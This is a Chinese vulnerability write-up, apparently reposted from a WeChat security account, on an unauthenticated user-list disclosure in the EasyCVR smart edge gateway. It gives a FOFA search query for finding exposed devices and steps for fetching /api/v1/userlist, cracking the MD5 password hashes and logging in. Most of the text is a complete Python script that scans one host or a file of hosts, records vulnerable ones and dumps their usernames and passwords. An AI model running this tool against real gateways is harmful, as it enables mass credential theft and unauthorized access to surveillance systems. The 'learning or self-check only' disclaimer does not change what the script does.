一、漏洞描述
EasyCVR智能边缘网关是TSINGSEE青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI智能检测、处理、分发等服务。通过对视频监控场景中的人、车、物等进行AI检测与抓拍,对异常情况进行智能提醒和通知,可广泛应用于安防监控、智能检测、通行核验等场景。
EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。
二、网络空间搜索引擎查询
fofa查询
title="EasyCVR"
三、漏洞复现
poc
或浏览器直接访问路径 /api/v1/userlist?pageindex=0&pagesize=10
然后将md5加密后的密码解密
然后使用上面的Name 值作为用户名登录
四、批量检测与利用
单个检测
python .EasyCVR.py -u ip:port
批量检测
python .EasyCVR.py -f filename
# _*_ coding:utf-8 _*_
# @Time : 2023/10/9 10:20
# @Author: 为赋新词强说愁
import requests
import argparse
from datetime import datetime
import time
import http.client
import json
requests.packages.urllib3.disable_warnings()
RED_BOLD = "\033[1;31m"
RESET = "\033[0m"
def usage():
global RED_BOLD
global RESET
text = '''
+-----------------------------------------------------------------+
微信公众号 网络安全透视镜
此脚本仅用于学习或系统自检查
使用方法:
单个 python3 EasyCVR.py -u url[例 http://127.0.0.1:8080]
批量 python3 EasyCVR.py -f filename
+-----------------------------------------------------------------+
根据《中华人民共和国刑法》规定,违反国家规定,对计算机信息系统功能进行\n删除、修改、增加、干扰,造成计算机信息系统不能正常运行的,处五年以下有期徒刑\n或者拘役;后果特别严重的,处五年以上有期徒刑。
违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行\n删除、修改、增加的操作,后果严重的,依照前款的规定处罚。
开始检测................................
'''
print(f"{RED_BOLD}{text}{RESET}")
# proxies = {'http':'http://127.0.0.1:10808}
def exp(text):
select = input("是否读取用户信息(是:1,否:0):")
# usage()
if select == "1":
parsed_data = json.loads(text.strip())
users = parsed_data["data"]
for user in users:
name = user["Name"]
username = user["Username"]
password = user["Password"]
print("Name:", name)
print("Username:", username)
print("Password:", password)
print()
elif select == "0":
exit()
else:
print("请重新输入正确选项")
def save_file(url):
with open('result.txt',mode='a',encoding='utf-8') as f:
f.write(url+'\n')
def poc(host,flag):
now_poc = datetime.now()
global RED_BOLD
global RESET
path = "/api/v1/userlist?pageindex=0&pagesize=10"
target = host
headers = {
"Cookie": "token=5YftUKGIR",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Dnt": "1",
"Upgrade-Insecure-Requests": "1",
}
try:
conn = http.client.HTTPSConnection(host)
conn.request("GET", path, headers=headers)
response = conn.getresponse()
text = response.read().decode()
if response.status == 200 and 'Username' in text:
print(f'{RED_BOLD}[+]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{host}\t漏洞存在{RESET}')
save_file(host)
else:
print(f'[-]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{host}\t漏洞不存在')
conn.close()
if flag == 1:
exp(text.strip())
except Exception as e:
print(f'[-]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{host}\t无法访问,请检查目标站点是否存在')
def run(filepath):
flag = 0
urls = [x.strip() for x in open(filepath, "r").readlines()]
for u in urls:
u = u.strip()
host = u.replace("https://", "")
host = host.replace("http://", "")
#print("host:",host)
poc(host,flag)
def main():
parse = argparse.ArgumentParser()
parse.add_argument("-u", "--url", help="python EasyCVR.py -u url")
parse.add_argument("-f", "--file", help="python EasyCVR.py -f file")
args = parse.parse_args()
url = args.url
filepath = args.file
usage()
time.sleep(3)
if url is not None and filepath is None:
flag = 1
poc(url,flag)
elif url is None and filepath is not None:
run(filepath)
else:
usage()
if __name__ == '__main__':
main()
原文始发于微信公众号(网络安全透视镜):EasyCVR智能边缘网关未授权访问用户信息泄露漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论